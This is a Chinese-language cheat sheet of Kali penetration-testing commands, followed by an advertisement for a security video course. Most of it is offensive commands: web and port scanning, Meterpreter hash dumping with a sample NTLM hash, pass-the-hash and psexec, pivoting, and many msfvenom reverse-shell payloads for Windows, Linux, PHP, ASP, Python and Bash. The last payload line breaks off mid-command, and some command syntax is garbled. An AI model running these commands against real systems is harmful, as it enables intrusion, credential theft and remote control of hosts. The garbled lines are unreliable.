总结在渗透测试上的一些小技巧，基本上都是 kali 下的一些常用的工具使用集合

DIRB
使用 DIRB 爆破目录
注： DIRB 是一个专门用于爆破目录的工具，在 Kali 中默认已经安装，类似工具还有国外的 patator ， dirsearch ， DirBuster ， 国内的御剑等等。

dirb http://[IP]:PORT /usr/share/dirb/wordlists/common.txt
Niko
使用 Nikto 扫描 Web 服务
nikto -C all -h http://[IP]
wpscan
使用 wpscan 扫描 WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url http:http://[IP]/ –enumerate p
httprint
使用 httprint 进行 HTTP 指纹识别
wget //www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h http://[IP] -s signatures.txt
Skipfish
使用 Skipfish 进行 Web 应用安全
注：Skipfish 是一款 Web 应用安全侦查工具，Skipfish 会利用递归爬虫和基于字典的探针生成一幅交互式网站地图，最终生成的地图会在通过安全检查后输出。

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://[IP]
nc
使用 nc 进行扫描
nc -v -w 1 target -z 1-1000
for i in {101…102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
us
使用 Unicornscan 进行信息收集和安全审计
us -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535

-H 在生成报告阶段解析主机名

-m 扫描类型 (sf - tcp, U - udp)

-Iv - 详细

Xprobe2
使用 Xprobe2 识别操作系统指纹
xprobe2 -v -p tcp:80:open IP
Meterpreter
使用 Meterpreter 进行端口转发

//www.offensive-security.com/metasploit-unleashed/portfwd/

转发远程端口到目标地址

meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
使用 Meterpreter 获取哈希值
git clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash http://[IP] cmd

或者

apt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP

再或者

meterpreter > run post/windows/gather/hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit
meterpreter > shell
使用 Hashcat 破解密码
hashcat -m 400 -a 0 hash /root/rockyou.txt
使用 metasploit 进行穿透
route add X.X.X.X 255.255.255.0 1
use auxiliary/server/socks4a
run
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E

或者

//www.offensive-security.com/metasploit-unleashed/pivoting/

meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > Ctrl+Z
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
meterpreter > ipconfig
IP Address : 10.1.13.2
ssh
SSH 穿透
ssh -D 127.0.0.1:1080 -p 22 user@IP
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains commands target
SSH 穿透从一个网络到另一个网络
ssh -D 127.0.0.1:1080 -p 22 user1@IP1
Add socks4 127.0.0.1 1080 in /etc/proxychains.conf
proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2
Add socks4 127.0.0.1 1081 in /etc/proxychains.conf
proxychains commands target
msfvenom
MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b “\x00” -a x86 --platform win -f c
MSF 生成在 Linux 下反弹的 Meterpreter Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell
MSF 生成反弹 Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b “\x00\x0a\x0d” -a x86 --platform win -f c
MSF 生成反弹 Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py
MSF 生成反弹 ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp
MSF 生成反弹 Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh
MSF 生成反弹 PHP Shell
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php
add <?php at the beginning
perl -i~ -0777pe’s/^/<?php \n/’ shell.php
MSF 生成反弹 Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=<Your Port to Co

kali 下渗透测试的一些小技巧

小编专门整理了一套有关网络安全2021从入门到精通学习视频教程

包含了网络安全学习路线全阶段视频教程（从入门到精通），涵盖了你所需要掌握的所有前沿技术及知识点！

资料针对人群

• 在校大学生
• 零基础小白
• 想学习安全课程的朋友
• 想转行的朋友
• 有运维基础想提升的朋友
• 想学习运维的朋友
• 想进阶学习网络安全

在学习网络安全的路上，难免深受这些难题的困扰：

• 如何才能成功进攻网络安全行业呢？
• 零基础怎样学习才能更快入门、学起来更有效率？
• 怎么确保自己学到的是市场需求的？

额外福利：安全学习路线一份和价值499的体验课程免费学习权限

kali 下渗透测试的一些小技巧